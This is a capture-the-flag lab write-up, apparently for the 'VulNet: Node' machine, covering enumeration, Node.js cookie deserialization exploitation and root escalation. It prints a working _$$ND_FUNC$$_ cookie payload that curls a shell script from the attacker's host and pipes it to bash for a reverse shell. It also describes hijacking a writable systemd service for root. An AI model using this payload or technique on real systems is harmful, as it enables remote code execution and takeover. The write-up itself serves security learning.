VulNet: Node

Scanning

Lets run nmap scan to find open ports and services

Enumeration

Lets visit the website on port 8080.

We have a Node.js webpage, we have some usernames

Tilo Mitra, Eric Ferraioulo, Reid Burke and Andrew Wooldridge

Lets look for hidden directories using gobuster

Lets look at the login page

We have a login form, but we do not have credentials. Lets try to submit random credentials and see what happens when we do with burpsuite.

Lets capture the request

Ok, so it looks like we have a session cookie even though we did not login yet, this is interesting. Lets send this request to the Repeater tab and test different requests with the cookie we have.

First lets decode the cookie as it looks encoded with base64.

So the username is guest and the isGuest value is set to true. I tried changing the username to admin and logging in , but it did not work, so lets see what the server will show us when there is an error in the request.

Exploitation

It looks like the web application is trying to unserialize the session cookie but it is showing an error. Lets look for exploit on this. And I found a blog that talks about this and shows us how to exploit this.

Reading the blog what we find the exploit that we will use.

So by passing the ND_FUNC into the statement , it will lead to code execution on the web app. So lets try to get a shell on the box, lets create a reverse shell file on our machine so that the server can curl the it and give us a reverse shell.

Next we have to change the payload a little so that it will give us a reverse shell.

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.13.8.64:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}

Next we have to start a http server on our machine and a netcat listener.

Lets encode the payload with base64 and then lets replace the current cookie value with our payload.

Now lets replace it and send the request

The file should get downloaded

And we should have a reverse shell

Privilege Escalation

Lets run the sudo -l command to see what we can run with sudo.

Lets look on GTFOBins to find the commands to switch users to serv-manage.

Lets run these commands.

We are now serv-manage. We can read the user flag.

Lets run sudo -l again.

Looks like we can edit a system service called vulnnet-auto.timer . Lets look at this file

Looks like it is executing a systemctl service called vulnnet-job.service. Lets see if we can modify this file and see what it contains.

We can write to the file. Lets modify the command and replace it with a reverse shell that we used before so that we can get a shell as root.

Lets start a netcat listener and the http server if you stopped it.

Lets now run the stop and start the service to get a shell.

We are now root. We can read the root flag.